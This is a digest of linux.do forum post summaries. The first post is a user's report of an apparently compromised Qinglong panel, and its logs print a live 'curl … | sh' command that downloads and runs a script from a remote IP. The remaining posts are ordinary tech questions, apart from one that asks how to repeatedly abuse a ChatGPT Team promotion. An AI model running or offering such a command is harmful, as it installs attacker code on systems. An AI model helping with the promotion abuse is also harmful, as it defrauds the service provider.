标题: 疑似青龙面板被挖矿
作者: #Zephyr
板块: #搞七捻三
编号: 1709713
帖子: https://linux.do/t/topic/1709713
时间: 2026-03-08 22:14:35
摘要:

就部署了一个库洛米签到脚本。。。。刚上床睡觉收到阿里云的告警短信，查青龙日志如下，gemini了一下，说是黑客入侵。。。有大手子看一下吗，青龙面板已关停，不知道服务器有没有啥影响
青龙版本：whyour/qinglong:2.20.1-debian
Gemini解答：
明确告诉你：有非常严重的安全异常！你的系统（看日志应该是青龙面板）已经被黑客入侵，并成功植入了恶意脚本。

这就是你上一个问题中提到的那个下载进度条的“罪魁祸首”。

核心异常分析
1. 典型的恶意代码下载与执行（高危）

[ℹ️info 2026-03-08 21:51:23]: [panel][开始执行任务] 参数: {"command":"real_log_path=curl/2026-03-08-21-51-23-986.log real_time=true task curl -fsSL http://104.194.158.160/1xa/xa.sh|sh"...}

这是什么： curl http://... | sh 是一种极其危险的“无文件落地”攻击手法。它直接从 104.194.158.160 这个未知 IP 下载了一个名为 xa.sh 的脚本，并直接交由系统的 shell 运行。

关联上文： 你上一个问题里那个 4.7MB 文件的下载进度条，正是这个恶意命令在后台拉取文件的过程。

2. 假报错，真运行

[ℹ️info 2026-03-08 21:57:16]: [panel][执行任务结束] ... 退出码: 0

日志中间有几十行 [执行任务失败] ... 错误信息:，这不是脚本运行失败了。这是因为青龙面板把 curl 正常的下载进度条输出（默认走 stderr 错误流）误认为是报错信息记录了下来。

最致命的是最后一行，退出码: 0 代表这个恶意脚本已经完全下载并成功在你的系统里执行完毕了。你的机器大概率已经开始挖矿，或者变成了受黑客控制的“肉鸡”。

3. 资源被长时间占用

[⚠️warn 2026-03-08 21:57:16]: Slow request detected: PUT /command-run took 352223.34ms

因为这个木马脚本下载得很慢（花了大概 5 分 49 秒，即 350000+ 毫秒），导致面板的接口请求也阻塞了这么长时间。

日志详情
[ℹ️info 2026-03-08 01:01:00]: [panel][开始执行任务] 参数: {"name":"库洛米","schedule":"1 1 * * *","command":"SUB_ID=1 ql repo \"https://gh-proxy.com/https://github.com/mxyooR/Kuro-autosignin.git\" \"ql_main.py\" \"\" \"log|push|tools|constants|models|http_client|config_manager|game_sign_in|forum_sign_in|sign_in_manager|main\" \"\" \"\" \"\" \"true\" \"true\"","id":"1"}
[ℹ️info 2026-03-08 01:01:05]: [panel][执行任务结束] 参数: {"name":"库洛米","schedule":"1 1 * * *","command":"SUB_ID=1 ql repo \"https://gh-proxy.com/https://github.com/mxyooR/Kuro-autosignin.git\" \"ql_main.py\" \"\" \"log|push|tools|constants|models|http_client|config_manager|game_sign_in|forum_sign_in|sign_in_manager|main\" \"\" \"\" \"\" \"true\" \"true\"","id":"1"}, 退出码: 0
[ℹ️info 2026-03-08 02:42:00]: [schedule][准备运行任务] 命令: real_time=false no_tee=true ID=1 log_name=mxyooR_Kuro-autosignin_ql_main task mxyooR_Kuro-autosignin/ql_main.py
[ℹ️info 2026-03-08 02:42:00]: [schedule][任务加入队列] 运行中任务数: 0, 等待中任务数: 1
[ℹ️info 2026-03-08 02:42:00]: [schedule][开始处理任务] 运行中任务数: 1, 等待中任务数: 0
[ℹ️info 2026-03-08 02:42:00]: [schedule][开始执行任务] 参数 {"id":"1","schedule":"42 2 * * *","command":"real_time=false no_tee=true ID=1 log_name=mxyooR_Kuro-autosignin_ql_main task mxyooR_Kuro-autosignin/ql_main.py","extra_schedules":[],"name":"ql_main.py"}
[ℹ️info 2026-03-08 02:42:18]: [schedule][执行任务结束] 参数: {"id":"1","schedule":"42 2 * * *","command":"real_time=false no_tee=true ID=1 log_name=mxyooR_Kuro-autosignin_ql_main task mxyooR_Kuro-autosignin/ql_main.py","extra_schedules":[],"name":"ql_main.py"}, 退出码: 0
[ℹ️info 2026-03-08 02:42:18]: [schedule][任务处理成功] 参数 {"id":"1","schedule":"42 2 * * *","command":"real_time=false no_tee=true ID=1 log_name=mxyooR_Kuro-autosignin_ql_main task mxyooR_Kuro-autosignin/ql_main.py","extra_schedules":[],"name":"ql_main.py","pid":1346028,"code":0}
[ℹ️info 2026-03-08 02:42:18]: [schedule][任务队列] 空闲中...
[ℹ️info 2026-03-08 02:42:18]: [schedule][任务处理结束] 运行中任务数: 0, 等待中任务数: 0
[ℹ️info 2026-03-08 21:51:23]: [panel][开始执行任务] 参数: {"command":"real_log_path=curl/2026-03-08-21-51-23-986.log real_time=true task curl -fsSL http://104.194.158.160/1xa/xa.sh|sh","id":"task-curl--fsSL-http://104.194.158.160/1xa/xa.sh|sh"}
[ℹ️info 2026-03-08 21:51:26]: [panel][执行任务失败] 命令: real_log_path=curl/2026-03-08-21-51-23-986.log real_time=true task curl -fsSL http://104.194.158.160/1xa/xa.sh|sh, 错误信息: "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n\r  0     0   "
[ℹ️info 2026-03-08 21:51:26]: [panel][执行任务失败] 命令: real_log_path=curl/2026-03-08-21-51-23-986.log real_time=true task curl -fsSL http://104.194.158.160/1xa/xa.sh|sh, 错误信息: " 0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"
[ℹ️info 2026-03-08 21:51:27]: [panel][执行任务失败] 命令: real_log_path=curl/2026-03-08-21-51-23-986.log real_time=t

标题: 有好东西！（best64编码）
作者: #Beibing
板块: #搞七捻三
编号: 1709720
帖子: https://linux.do/t/topic/1709720
时间: 2026-03-08 22:16:21
摘要:

5oS/5L2g5aSp5aSp5byA5b+D77yB   解码看看

标题: 为什么codex这么喜欢删文件呢？ 我头一回用。。。。
作者: #shall mas
板块: #搞七捻三
编号: 1709728
帖子: https://linux.do/t/topic/1709728
时间: 2026-03-08 22:17:56
摘要:

准备尝鲜GPT5.4，居然真的会整个整个的删？？
仅仅是改一行内容而已啊

标题: 求佬友推荐轻薄本
作者: #Chihaya_Anon
板块: #搞七捻三
编号: 1709731
帖子: https://linux.do/t/topic/1709731
时间: 2026-03-08 22:18:17
摘要:

求佬友推荐适合大学生用的轻薄本，预算大概3k以内（花呗每个月从生活费里挤），平时主要就是上课记笔记、做PPT、做网络实验敲，代码这些。希望电脑轻一点，续航也行，出问题售后好一点的。自己21年买的游戏本现在电池不行了，而且背着电源和电脑都好几斤，出去做项目背着累续航也崩难受死了

标题: z-library候补资格有人领取了吗
作者: #Steve Jobs
板块: #搞七捻三
编号: 1709735
帖子: https://linux.do/t/topic/1709735
时间: 2026-03-08 22:19:24
摘要:

标题: 现在买MacBook Air M5划算还是老款ProM1 Max划算呢
作者: #吗蓉
板块: #搞七捻三
编号: 1709759
帖子: https://linux.do/t/topic/1709759
时间: 2026-03-08 22:22:34
摘要:

rt，9月份上大学，因为不怎么打游戏，手上还有一台12代i7的win本不考虑软件兼容问题。所以指定MacBook。但是我看官网

16+1TB已经9999 (click for more details)
相比小黄鱼上的21款M1Max 32+1TB在8000元档。单核稍弱买综合性能好像完爆M5？
或者说佬友们有没有其他的推荐，基本需求就是在万元附近买一台性价比稍微好一些，几年之内不会淘汰，能折腾AI和“AI”的MacBook。
对了，要是买全新可以吃上教育优惠。

标题: 最近想做点小项目，说说你的想法
作者: #tao725
板块: #搞七捻三
编号: 1709773
帖子: https://linux.do/t/topic/1709773
时间: 2026-03-08 22:24:42
摘要:

这几天想整点东西玩玩，但是又无从下手，佬友们有好玩的项目或者想法嘛
可以一起聊聊

标题: ClaudeCode有没有类似Codex类似的桌面端
作者: #龙猪猪
板块: #开发调优
编号: 1709776
帖子: https://linux.do/t/topic/1709776
时间: 2026-03-08 22:25:09
摘要:

cc一直黑窗口还是很不习惯，切来切去，用过codex之后感觉舒畅很多，有多会话管理、文件修改差异、git和worktree

标题: 有什么工具能让 OpenCode 接入网页分析的功能吗？用来做爬虫项目
作者: #Only Linux Can Do(OLCO)
板块: #开发调优
编号: 1709782
帖子: https://linux.do/t/topic/1709782
时间: 2026-03-08 22:26:48
摘要:

vibe coding 环境：

Opencode
Oh my OpenAgent


需要一个网页元素分析工具
做爬虫相关的项目。

标题: 关于孙大佬的GrokSearch at grok-with-tavily，这里提供一个本地配置的方法，以免本机使用连不上github（可能有人和我一样懒得配代理吧）
作者: #czy098
板块: #开发调优
编号: 1709790
帖子: https://linux.do/t/topic/1709790
时间: 2026-03-08 22:27:24
摘要:

以下是mcp的写法，可以直接粘贴进cc-switch的mcp的json。
{
“args”: [
“–from”,
“你clone的绝对目录/GrokSearch”,
“grok-search”
],
“command”: “uvx”,
“env”: {
“GROK_API_KEY”: “你的key”,
“GROK_API_URL”: “你的来源/v1”,
“GROK_MODEL”: “grok-4.1-fast（自己调整）”,
“TAVILY_API_KEY”: “你的key”,
“TAVILY_API_URL”: “https://api.tavily.com”
},
“type”: “stdio”
}
以下是cherry studio中的写法：
stdio
uvx
参数：–from
同上，绝对目录/GrokSearch
grok-search
环境变量：
GROK_API_URL=你的来源站点/v1
GROK_API_KEY=你的key
TAVILY_API_KEY=你的key
FIRECRAWL_API_KEY=你的key
GROK_MODEL=grok-4.1-fast（自行选择）

标题: 求助gpt team 0元开通 payapl循环付款帖子是哪一个
作者: #agi_is_coming
板块: #搞七捻三
编号: 1709791
帖子: https://linux.do/t/topic/1709791
时间: 2026-03-08 22:27:33
摘要:

我记得之前论坛中有个关于使用paypal 付款chatgpt的新号 0元team活动的讨论分享。
使用paypal付款，如果第一个月team到期后，将开team的这个gpt账号注销后。
过了1个月后又可以继续用这个账号此前付款的同一个paypal进行chatgpt的新号 0元team活动的付款。
并且可以重复这样操作，不会封号。
有佬记得是哪一个帖子吗？

标题: 【提问】如何发挥openclaw最大的能力？
作者: #黑格尔
板块: #开发调优
编号: 1709801
帖子: https://linux.do/t/topic/1709801
时间: 2026-03-08 22:30:46
摘要:

一键脚本就安装好了，然后看着workplace文件夹只能发呆
怎么配置轻量模型和主力模型？怎么写各个agent的workplace？main agent应不应该改动？还有向量模型怎么配置？

标题: 自从cc渠道没了后，工作效率直线下降
作者: #Coast2025
板块: #搞七捻三
编号: 1709803
帖子: https://linux.do/t/topic/1709803
时间: 2026-03-08 22:31:05
摘要:

自从kiro等渠道没了后，各位佬的公益站都没了claude，改为codex后，工作效率直线下降，我看codex解决问题速度是真“快”

标题: 有没有好用的拼图软件？
作者: #Enoch31
板块: #搞七捻三
编号: 1709814
帖子: https://linux.do/t/topic/1709814
时间: 2026-03-08 22:32:30
摘要:

有没有好用的拼图软件？就是把几张图片拼接起来，制作成长图？安卓免费

标题: QQ小小修仙
作者: #烟火清凉
板块: #搞七捻三
编号: 1709823
帖子: https://linux.do/t/topic/1709823
时间: 2026-03-08 22:33:53
摘要:

佬们有没有QQ机器人小小修仙辅助的路子啊

标题: 升级还遥遥无期
作者: #叼毛佬
板块: #搞七捻三
编号: 1709831
帖子: https://linux.do/t/topic/1709831
时间: 2026-03-08 22:34:53
摘要: